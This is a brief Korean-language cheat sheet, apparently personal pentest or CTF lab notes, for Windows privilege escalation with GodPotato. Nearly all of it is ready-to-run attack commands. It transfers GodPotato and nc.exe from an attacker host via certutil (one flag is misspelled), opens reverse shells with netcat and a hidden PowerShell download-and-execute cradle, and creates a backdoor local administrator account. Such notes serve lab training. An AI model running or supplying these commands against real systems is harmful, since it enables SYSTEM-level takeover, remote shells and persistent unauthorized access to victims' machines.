NET Framework version 확인

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

GodPotato 공격자 칼리에서 타겟 호스트로 Transfer

certutil -urlcahce -split -f http://<attacker-ip>/GodPotato.exe gp.exe

기본 테스트

.\gp.exe -cmd "whoami"

.\gp.exe -cmd "cmd.exe /c whoami /all > C:\Users\merlin\Desktop\god.txt"

type C:\Users\merlin\Desktop\god.txt

리버스 쉘 - nc.exe

# nc.exe transfer
certutil -urlcache -split -f http://<attacker-IP>/nc64.exe nc.exe

# test
.\nc.exe <attacker-IP> 80 -e C:\Windows\system32\cmd.exe 

# GodPotato
.\gp.exe -cmd ".\nc.exe <attacker-IP> 80 -e C:\Windows\System32\cmd.exe"

리버스 쉘 2

# 공격자
rlwrap nc -lvnp 4444

# 타겟
.\GodPotato.exe -cmd "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.9/Invoke-PowerShellTcp.ps1>');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444"

Admin 만들기

GodPotato.exe -cmd "net user wook P@ssw0rd! /add"
GodPotato.exe -cmd "net localgroup administrators wook /add"